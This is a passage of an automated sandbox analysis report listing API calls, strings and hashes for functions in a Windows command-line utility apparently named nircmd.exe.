                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleLibrary$ErrorFreeLastmemset$ProcessProcess32$AddressByteCharCreateCurrentFirstLoadMultiNextOpenProcSnapshotToolhelp32Wide
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 3149602138-2896544425
                                                      • Opcode ID: 70be08f02be23f15489362f91db534fbf102b2f81c88aafaba976d8bd2f6eebe
                                                      • Instruction ID: 11b70bda48b1d8c568e68257f6bfe3ea0126de163d0e533b3a456ffbac74b7bf
                                                      • Opcode Fuzzy Hash: 70be08f02be23f15489362f91db534fbf102b2f81c88aafaba976d8bd2f6eebe
                                                      • Instruction Fuzzy Hash: 04516971801268AFDB20EF65DC849DE3BA8FF08B44F11412BFE15E22A1D7789955CF98
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strcmpi
                                                      • String ID: cancel$close$help$ignore$retry$yes
                                                      • API String ID: 1439213657-4066124357
                                                      • Opcode ID: ee2e5cfa8ef28a114d4274b2f8462284868e833512c48c2d8bb767c99bb01b93
                                                      • Instruction ID: 9533f4aa031e0338bf16b211eecd7ea11a36002ea6de446394b0a8781d1b28e7
                                                      • Opcode Fuzzy Hash: ee2e5cfa8ef28a114d4274b2f8462284868e833512c48c2d8bb767c99bb01b93
                                                      • Instruction Fuzzy Hash: E1013CF23AE71528F91925656F17BCA42888B10B3BF30106BF924E40C2FFDC59C1104C
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(psapi.dll,00000000,0040E55F,00000104,0040E46B,?,00000000,?,?,?,?,00000000), ref: 0040E58A
                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E59E
                                                      • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040E5AA
                                                      • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 0040E5B6
                                                      • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 0040E5C2
                                                      • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 0040E5CE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                      • API String ID: 2238633743-232097475
                                                      • Opcode ID: d86b9189533c92767b48b8f457185df58f04a271026efabb8b0961f9f6d7d4b6
                                                      • Instruction ID: 1f806c2beddc41445365b716785778413a1ba09f5a0006f55f70f71c0a300a82
                                                      • Opcode Fuzzy Hash: d86b9189533c92767b48b8f457185df58f04a271026efabb8b0961f9f6d7d4b6
                                                      • Instruction Fuzzy Hash: 85F0D474E44344AACB306FB69C09E46BEF1EF987017218C2FE1C5A3660D7799281CF48
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: memset$memcpy$_mbscpy_strcmpi
                                                      • String ID: Cannot find the specified process !$Failed to load the process library !$bin$noascii$nohex
                                                      • API String ID: 3151238675-4186054902
                                                      • Opcode ID: b830ef37f156b8544966f0cf6b1d1a9e6bff85abafff0fec9d094babc2d4475c
                                                      • Instruction ID: 3bab61cf86fbcf8dacd901e450bc04c43f6c0fb12eb641aeba2398d55cb04ec1
                                                      • Opcode Fuzzy Hash: b830ef37f156b8544966f0cf6b1d1a9e6bff85abafff0fec9d094babc2d4475c
                                                      • Instruction Fuzzy Hash: A451D5B1D00218ABDB10AF55CD82ADE7778AB04308F1504BFE509B6282D7B8CBA4CF59
                                                      APIs
                                                      • GetLastError.KERNEL32 ref: 00409EBF
                                                      • sprintf.MSVCRT ref: 00409EE7
                                                      • MessageBoxA.USER32(?,?,Error,00000030), ref: 00409F0E
                                                        • Part of subcall function 0040E6E6: memset.MSVCRT ref: 0040E71E
                                                        • Part of subcall function 0040E6E6: memcpy.MSVCRT ref: 0040E729
                                                        • Part of subcall function 0040E6E6: strlen.MSVCRT ref: 0040E736
                                                        • Part of subcall function 0040E6E6: strcmp.MSVCRT ref: 0040E74D
                                                        • Part of subcall function 0040E6E6: GetCurrentProcess.KERNEL32 ref: 0040E75A
                                                        • Part of subcall function 0040E6E6: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0040E76F
                                                        • Part of subcall function 0040E6E6: GetProcAddress.KERNEL32(00000000), ref: 0040E776
                                                        • Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E7BC
                                                        • Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E7D4
                                                        • Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E7EC
                                                        • Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E804
                                                        • Part of subcall function 0040E6E6: _strcmpi.MSVCRT ref: 0040E81C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strcmpi$AddressCurrentErrorHandleLastMessageModuleProcProcessmemcpymemsetsprintfstrcmpstrlen
                                                      • String ID: Cannot delete the key, because it contains one or more subkeys.$Error$Error %d: %s$The specified key is not valid !
                                                      • API String ID: 312217311-3851681830
                                                      • Opcode ID: 76fde70ad3bed5aa2d9a9ba37b3fca5a39bd747f8f1cb7f2d6cf2db1f36cd31d
                                                      • Instruction ID: 784e17db3339b62a1aa1aa82f5d838bb963f59f64cfb1df870e710820f8d6ac9
                                                      • Opcode Fuzzy Hash: 76fde70ad3bed5aa2d9a9ba37b3fca5a39bd747f8f1cb7f2d6cf2db1f36cd31d
                                                      • Instruction Fuzzy Hash: 4041F272904289ABEB20AF25DC499DA77A8EB04745F20007BF915F21E3DB7C8D90CF58
                                                      APIs
                                                      • _strcmpi.MSVCRT ref: 00405F2B
                                                      • _strcmpi.MSVCRT ref: 00405F5D
                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F6E
                                                      • _strcmpi.MSVCRT ref: 00405F7F
                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,?,0040547C,?,?,?,?,?,?,?,?,?), ref: 00405F90
                                                      • _strcmpi.MSVCRT ref: 00405F9E
                                                        • Part of subcall function 004028DE: GetModuleFileNameA.KERNEL32(00000000,?,00000104,004011D3,?,?,nircmd.exe), ref: 004028E9
                                                      • strlen.MSVCRT ref: 00405FB0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strcmpi$Directory$FileModuleNameSystemWindowsstrlen
                                                      • String ID: common_desktop$nircmd$system$windows
                                                      • API String ID: 2486978100-2686657270
                                                      • Opcode ID: 747c6446d4b2c1cebd3299d11d899ef7d53cdd2988406ff32c175a732552d525
                                                      • Instruction ID: 5947eef841a5e8925d4be8e3b7c31605027da9b826bc5d0fb9f51de0496962b5
                                                      • Opcode Fuzzy Hash: 747c6446d4b2c1cebd3299d11d899ef7d53cdd2988406ff32c175a732552d525
                                                      • Instruction Fuzzy Hash: 9E119E3126CB476DFB1422312E06AEB4A98CF51729F21007BF101F90D2FABC94825A1E
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??2@??3@sprintf$memcpymemset
                                                      • String ID: %2.2X $%8.8X
                                                      • API String ID: 1143686992-259817711
                                                      • Opcode ID: c468a52c06907f0afbf66440125d3eea1aa4e88bb4fc5f68323c813c2e0e206d
                                                      • Instruction ID: 4d768b6b6e81dca40bb3363254cb90b05480aafa21f2031784f48b699a26a5d5
                                                      • Opcode Fuzzy Hash: c468a52c06907f0afbf66440125d3eea1aa4e88bb4fc5f68323c813c2e0e206d
                                                      • Instruction Fuzzy Hash: 9F41D672D04349AFDB10EFA5D985EDF77B8AF45314F10046BF801B72C2D6B9A99087A8
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,004012BF,00000104,00404917,?,?,?,?), ref: 00401275
                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 0040128A
                                                      • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00401296
                                                      • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004012A3
                                                      • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserA), ref: 004012B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CreateProcessAsUserA$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                      • API String ID: 2238633743-3283825160
                                                      • Opcode ID: cb6503820662f63635737c408e418417153d96e438ec5df7082c301eceaf9fe3
                                                      • Instruction ID: 8e3aa53b682d86820f5d0eade8699635e8bf9ffec988052a3a6b967c8f920fb2
                                                      • Opcode Fuzzy Hash: cb6503820662f63635737c408e418417153d96e438ec5df7082c301eceaf9fe3
                                                      • Instruction Fuzzy Hash: 7DF09E749407449BC7306F719909A47BEF5EB887007118E2EE59692660D7B89194CF14
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _strcmpi$Initializeatoimemset
                                                      • String ID: /$Failed to create the shortcut !$common_desktop$max$min
                                                      • API String ID: 3607272115-991234290
                                                      • Opcode ID: d6b06a6848c1ce2c444c11b758981b0a8ffcc1ff64d184ef6d77849581fc770a
                                                      • Instruction ID: 4218e0be564c759bf83c50324c907cf8d3c78bc49d63cf7ff5d68227ca9ba783
                                                      • Opcode Fuzzy Hash: d6b06a6848c1ce2c444c11b758981b0a8ffcc1ff64d184ef6d77849581fc770a
                                                      • Instruction Fuzzy Hash: 9741E7B2D04218ABE7209A55DC46BDB77ACAF40314F1440ABE918F71C1E778EB89CB95
                                                      APIs
                                                        • Part of subcall function 0040E631: ??3@YAXPAX@Z.MSVCRT ref: 0040E638
                                                      • EnumDisplayMonitors.USER32(00000000,00000000,Function_00003782,?), ref: 00403810
                                                      • memset.MSVCRT ref: 0040382F
                                                      • memset.MSVCRT ref: 0040383D
                                                      • EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 00403861
                                                      • EnumDisplayDevicesA.USER32(?,00000000,?,00000000), ref: 00403880
                                                        • Part of subcall function 004036F3: memset.MSVCRT ref: 00403718
                                                        • Part of subcall function 004036F3: EnumDisplaySettingsA.USER32(?,?,?), ref: 00403734
                                                        • Part of subcall function 004036F3: GetLastError.KERNEL32(?,?), ref: 00403773
                                                      • _mbsicmp.MSVCRT ref: 004039A0
                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00403A00
                                                      • EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 00403A4D
                                                        • Part of subcall function 00402269: malloc.MSVCRT ref: 00402285
                                                        • Part of subcall function 00402269: memcpy.MSVCRT ref: 0040229D
                                                        • Part of subcall function 00402269: ??3@YAXPAX@Z.MSVCRT ref: 004022A6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DisplayEnum$??3@Devicesmemset$ErrorLastMonitorsSettings_mbsicmpmallocmemcpy
                                                      • String ID: L
                                                      • API String ID: 2903658310-2909332022
                                                      • Opcode ID: c60c69b8f27440800f27c7082f7fd5e77fc616ed6f2f13017bcc7f2c11ade108
                                                      • Instruction ID: 9c27dbe0daf64dd140cd48ab2047f80adb7cbb8650d39170bfa634fe6fa172a2
                                                      • Opcode Fuzzy Hash: c60c69b8f27440800f27c7082f7fd5e77fc616ed6f2f13017bcc7f2c11ade108
                                                      • Instruction Fuzzy Hash: E27108B2D00218AFDB20DF55DC80ADEBBB8FB08315F1085BAE519B7281D774AB858F54
                                                      APIs
                                                        • Part of subcall function 0040D92C: GetCurrentProcess.KERNEL32(?,00000000,?), ref: 0040D935
                                                        • Part of subcall function 0040D92C: LoadLibraryA.KERNEL32(advapi32.dll,?,00000000,?), ref: 0040D944
                                                        • Part of subcall function 0040D92C: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0040D956
                                                        • Part of subcall function 0040D92C: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 0040D96C
                                                        • Part of subcall function 0040D92C: GetLastError.KERNEL32(?,00000000,?), ref: 0040D976
                                                        • Part of subcall function 00401337: LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 00401342
                                                        • Part of subcall function 00401337: GetProcAddress.KERNEL32(00000000,WTSQueryUserToken), ref: 00401356
                                                        • Part of subcall function 00401337: GetModuleHandleA.KERNEL32(kernel32.dll,WTSGetActiveConsoleSessionId), ref: 00401365
                                                        • Part of subcall function 00401337: GetProcAddress.KERNEL32(00000000), ref: 0040136C
                                                      • FreeLibrary.KERNEL32(?), ref: 0040629F
                                                      • memset.MSVCRT ref: 0040630D
                                                      • GetLastError.KERNEL32(?,00000001,?), ref: 00406361
                                                      • FreeLibrary.KERNEL32(?), ref: 00406372
                                                      • memset.MSVCRT ref: 00406381
                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000400,00000000,00000000,?,?), ref: 004063B1
                                                      • GetLastError.KERNEL32 ref: 004063BB
                                                      • FreeLibrary.KERNEL32(?), ref: 004063CC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Library$Free$AddressErrorLastProc$LoadProcessmemset$CreateCurrentHandleModule
                                                      • String ID: SeTcbPrivilege
                                                      • API String ID: 4182509570-1502394177
                                                      • Opcode ID: 620ef7b188f2ca0eee884da0495f1f3e4d0a256d288b19548af8a40a9493bf2a
                                                      • Instruction ID: 9daa2bc9eff459c8337e38c77d0624d85a8e4a3cac7da581018ae75e86d7491e
                                                      • Opcode Fuzzy Hash: 620ef7b188f2ca0eee884da0495f1f3e4d0a256d288b19548af8a40a9493bf2a
                                                      • Instruction Fuzzy Hash: 7F51D5B190024CAFDF10DFA5CD859EE7BA8BB08344F51443AFE16A2290D738DD55CB55
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _mbscpystrlen$_mbscatmemsetstrchr
                                                      • String ID: .lnk$<>:"/\|
                                                      • API String ID: 1872820629-1888144795
                                                      • Opcode ID: cb084710c470074afeffb608f3317f87414e009bcb5e454975b98be3e955be07
                                                      • Instruction ID: 2f91d3a8cc207012c0af06d0eedb5f106dc3c31a4db85c1f9429671d9a1579a9
                                                      • Opcode Fuzzy Hash: cb084710c470074afeffb608f3317f87414e009bcb5e454975b98be3e955be07
                                                      • Instruction Fuzzy Hash: CB31A77280421DAEDF129F50DC85DDA7B6CEF14315F1000ABF944A6091EAB99FD58F98
                                                      APIs
                                                      • memset.MSVCRT ref: 00410814
                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Multimedia\Sound Mapper,00000000,00020019,?), ref: 00410830
                                                      • RegCloseKey.ADVAPI32(?), ref: 00410856
                                                      • waveOutGetNumDevs.WINMM ref: 00410867
                                                      • memset.MSVCRT ref: 0041087A
                                                      • waveOutGetDevCapsA.WINMM(00000000,?,00000034), ref: 00410886
                                                      • _strcmpi.MSVCRT ref: 0041089B
                                                        • Part of subcall function 0040E8FD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?,0040CCF2,?,?,?), ref: 0040E918
                                                      Strings
                                                      • Playback, xrefs: 00410841
                                                      • Software\Microsoft\Multimedia\Sound Mapper, xrefs: 00410826
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: memsetwave$CapsCloseDevsOpenQueryValue_strcmpi
                                                      • String ID: Playback$Software\Microsoft\Multimedia\Sound Mapper
                                                      • API String ID: 2430942901-2460313733
                                                      • Opcode ID: a965f1a33e828a392d89d92f9d736537487115c1b896888affbead4bf9ea8747
                                                      • Instruction ID: ac484586679ba834272b1b6fd8eb699e902f73b4a2f6ffc3aa52bf72ddeb07ec
                                                      • Opcode Fuzzy Hash: a965f1a33e828a392d89d92f9d736537487115c1b896888affbead4bf9ea8747
                                                      • Instruction Fuzzy Hash: C3110BF1A04208AFF711AB619D81FEB77ACAF44344F10007AF649E2552E3F89EC49698
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _mbscpy$DirectoryWindows_mbscatmemsetstrchr
                                                      • String ID: \systemroot$`iA
                                                      • API String ID: 31225409-2214950577
                                                      • Opcode ID: aa56806e77d3b6df0e3125594558de194b2e5426a917646e65390bb50b0ffab1
                                                      • Instruction ID: e0ca7cd843fdb7f209439989472fbcd147738b1dcf767aea4e7b4a175c23940d
                                                      • Opcode Fuzzy Hash: aa56806e77d3b6df0e3125594558de194b2e5426a917646e65390bb50b0ffab1
                                                      • Instruction Fuzzy Hash: CE11E6B59042087AFB10AB95DC41FDA3BACDF18348F10406BF449A2192D7B8DAC88B99
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?), ref: 0040D935
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00000000,?), ref: 0040D944
                                                      • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0040D956
                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 0040D96C
                                                      • GetLastError.KERNEL32(?,00000000,?), ref: 0040D976
                                                      • GetLastError.KERNEL32(?,?,00000000,?), ref: 0040D9A7
                                                      • CloseHandle.KERNEL32(?,?,?,00000000,?), ref: 0040D9B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastLibrary$AddressCloseCurrentFreeHandleLoadProcProcess
                                                      • String ID: OpenProcessToken$advapi32.dll
                                                      • API String ID: 1272396852-358123303
                                                      • Opcode ID: 468ab1f40062e446c86e51308073e0404f006b121ed6c2928513a95c3b057816
                                                      • Instruction ID: 1375e2997d7b205251fe17e056bfdc42f4edd618f149c0a8aa52b8e44798b992
                                                      • Opcode Fuzzy Hash: 468ab1f40062e446c86e51308073e0404f006b121ed6c2928513a95c3b057816
                                                      • Instruction Fuzzy Hash: EB01D672E00104ABD701ABE0CD49AEE7BB8EF08340F118036FB01F2260EB788E449769
                                                      APIs
                                                      • GetClipboardData.USER32(0000000D), ref: 00402BEB
                                                      • GlobalFix.KERNEL32(00000000), ref: 00402BFE
                                                      • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000004,00000000,00000000), ref: 00402C23
                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00402C30
                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00402C45
                                                      • wcslen.MSVCRT ref: 00402C6A
                                                      • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402C75
                                                      • CloseHandle.KERNEL32(00000000), ref: 00402C91
                                                      • GlobalUnWire.KERNEL32(?), ref: 00402CA1
                                                      • CloseClipboard.USER32 ref: 00402CA9
                                                      Memory Dump Source
                                                      • Source File: 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000012.00000002.2197053442.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197078255.0000000000417000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197127871.0000000000419000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000012.00000002.2197153243.000000000041B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_18_2_400000_screen.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$ClipboardCloseGlobal$CreateDataHandlePointerSizeWireWritewcslen
                                                      • String ID:
                                                      • API String ID: 1746662600-0
                                                      • Opcode ID: 93bcda7092c4bfdc4dc742b2051549645153115191e6af116e4ee58835ec25c8
